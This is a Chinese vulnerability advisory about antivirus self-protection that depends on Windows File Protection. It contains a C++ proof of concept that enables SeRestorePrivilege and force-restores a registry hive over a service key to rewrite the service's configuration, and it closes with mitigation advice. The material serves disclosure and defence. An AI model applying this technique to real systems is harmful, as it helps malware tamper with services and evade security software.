杀毒软件在主动防御时过于依赖 WFP (Windows File Protection, 系统文件保护), 漏防了系统自身的文件, 导致恶意程序可以通过感染/替换系统 DLL 绕过主动防御, 执行任意操作.
DllHijack POC代码:
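// Enables one named privilege (the POC passes SE_RESTORE_NAME) on the current
// process token. Despite the name, any privilege constant may be passed.
//
// Returns TRUE only when the privilege was actually enabled. A non-zero return
// from AdjustTokenPrivileges does NOT mean that: if the token does not hold
// the privilege the call still "succeeds" and sets ERROR_NOT_ALL_ASSIGNED, so
// GetLastError() has to be consulted too. The original returned the raw
// AdjustTokenPrivileges result and so reported success for unprivileged users.
BOOL EnableDebugPriv(LPCTSTR lpName)
{
    BOOL bRet = FALSE;
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp = {};
    LUID luid = {};

    do {
        if (!OpenProcessToken(GetCurrentProcess(),
                              TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
            break;
        if (!LookupPrivilegeValue(NULL, lpName, &luid))
            break;

        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luid;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL))
            break;
        // Only ERROR_SUCCESS means the privilege is now enabled on the token.
        bRet = (GetLastError() == ERROR_SUCCESS);
    } while (FALSE);

    if (hToken != NULL)
        CloseHandle(hToken);
    return bRet;
}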
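// Overwrites the registry key hKey\lpSubKey with the contents of the hive file
// szFilePath using RegRestoreKey(REG_FORCE_RESTORE). This is the POC's attack
// primitive: REG_FORCE_RESTORE replaces the key wholesale even while it is
// open, and it requires SeRestorePrivilege on the caller's token, which is
// enabled here first. The key is created if it does not exist yet.
//
// Returns TRUE only when the restore succeeded. The original had the
// condition inverted (`!= ERROR_SUCCESS` set bRet to TRUE), so it reported
// success exactly when the restore failed.
BOOL RestoreReg(HKEY hKey, LPCWSTR lpSubKey, TCHAR szFilePath[MAX_PATH])
{
    BOOL bRet = FALSE;
    HKEY hCur = NULL;

    do {
        // Without SeRestorePrivilege RegRestoreKey fails with ERROR_PRIVILEGE_NOT_HELD.
        if (!EnableDebugPriv(SE_RESTORE_NAME))
            break;
        // Open the existing key, or create it when opening fails.
        if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &hCur) != ERROR_SUCCESS &&
            RegCreateKey(hKey, lpSubKey, &hCur) != ERROR_SUCCESS)
            break;
        bRet = (RegRestoreKey(hCur, szFilePath, REG_FORCE_RESTORE) == ERROR_SUCCESS);
    } while (FALSE);

    if (hCur != NULL)
        RegCloseKey(hCur);
    return bRet;
}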
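// MFC entry point of the POC. Forces the hive file C:\poc.hiv over the service
// key HKLM\SYSTEM\CurrentControlSet\Services\poc, demonstrating that a process
// able to enable SeRestorePrivilege can rewrite a service's configuration
// (presumably its image/DLL path -- the hive contents are not shown here)
// without the WFP-based self-protection noticing. The return value of
// RestoreReg is deliberately ignored; the POC returns TRUE unconditionally.
BOOL CDllHijackApp::InitInstance()
{
    CWinApp::InitInstance();
    RestoreReg(HKEY_LOCAL_MACHINE,
               L"SYSTEM\\CurrentControlSet\\Services\\poc",
               L"C:\\poc.hiv");
    return TRUE;
}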
修复方案:
不能仅依赖 WFP: 主动防御应自行校验系统 DLL 的完整性(数字签名/哈希), 并监控对 HKLM\SYSTEM\CurrentControlSet\Services 下服务项的写入, 特别是启用 SeRestorePrivilege 后以 REG_FORCE_RESTORE 调用 RegRestoreKey 强制覆盖服务配置的行为.